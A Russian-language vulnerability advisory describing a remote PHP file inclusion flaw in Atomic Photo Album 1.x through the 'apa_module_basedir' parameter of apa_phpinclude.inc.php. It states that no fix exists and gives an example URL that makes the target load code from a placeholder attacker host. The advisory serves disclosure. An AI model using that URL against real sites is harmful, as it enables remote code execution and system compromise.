PHP-инклюдинг в Atomic Photo Album

Дата публикации:
27.07.2005
Всего просмотров:
2207
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2413
CVE-2008-4335
CVE-2008-4336
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Atomic Photo Album 1.x
Уязвимые версии: Atomic Photo Album

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует в сценарии 'apa_phpinclude.inc.php' из-за недостаточной обработки входных данных в параметре 'apa_module_basedir'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[target]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[attacker]/

URL производителя: atomicpa.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include

или введите имя

CAPTCHA